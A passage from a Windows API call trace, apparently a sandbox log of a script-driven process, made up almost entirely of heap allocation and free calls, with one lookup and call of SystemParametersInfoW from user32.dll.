lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0278.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0278.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0278.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0278.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b68 [0278.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0278.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0278.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0278.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0278.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0278.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0278.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0278.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0278.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519a0 [0278.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0278.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0278.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0278.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0278.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0278.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0278.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0278.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0278.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0278.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0278.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a30 [0278.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0278.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0278.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0278.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0278.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0278.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0278.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0278.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0278.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0278.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0278.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0278.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0278.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0278.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0278.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0278.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0278.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0278.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0278.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0278.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0278.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0278.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0278.297] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0278.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0278.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0278.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0278.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0278.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0278.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0278.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0278.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0278.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0278.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0278.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0278.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0278.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0278.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0278.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0278.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0278.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0278.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0278.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0278.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0278.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0278.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0278.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0278.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0278.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0278.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0278.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0278.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0278.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0278.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0278.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0278.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0278.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0278.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0278.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0278.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0278.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0278.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0278.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0278.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0278.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0278.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0278.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0278.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0278.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0278.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0278.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0278.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0278.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0278.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0278.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0278.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0278.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0278.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0278.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0278.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0278.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0278.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0278.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0278.299] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0278.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0278.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0278.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0278.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0278.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0278.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0278.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0278.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0278.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0278.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0278.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0278.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0278.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0278.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0278.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0278.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0278.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0278.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0278.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0278.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0278.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0278.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0278.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0278.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0278.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0278.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0278.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0278.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0278.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0278.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0278.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0278.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0278.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0278.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0278.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0278.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0278.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0278.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0278.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0278.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0278.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0278.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0278.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0278.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0278.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0278.301] LoadLibraryW (lpLibFileName="user32.dll") returned 0x750c0000 [0278.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0278.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0278.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0278.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69ac8 [0278.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2e69ac8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0278.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0278.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0278.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0278.302] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoW") returned 0x750ef210 [0278.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0278.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0278.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0278.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0278.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0278.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0278.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0278.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0278.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0278.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0278.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0278.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0278.302] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0278.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14f50 [0278.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0278.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0278.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0278.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0278.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0278.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0278.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0278.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0278.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0278.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0278.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0278.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0278.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0278.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0278.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0278.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0278.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0278.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0278.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0278.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0278.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0278.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0278.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0278.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0278.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0278.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0278.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0278.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0278.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0278.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0278.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0278.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0278.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0278.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0278.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0278.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0278.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0278.473] FreeLibrary (hLibModule=0x750c0000) returned 1 [0278.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0278.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0278.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0278.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0278.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0278.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0278.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0278.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0278.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0278.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0278.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0278.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0278.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0278.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0278.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0278.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0278.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0278.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0278.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0278.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0278.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0278.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0278.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0278.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0278.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0278.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0278.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0278.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0278.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0278.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0278.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15178 [0278.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0278.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0278.475] HeapFree (in: 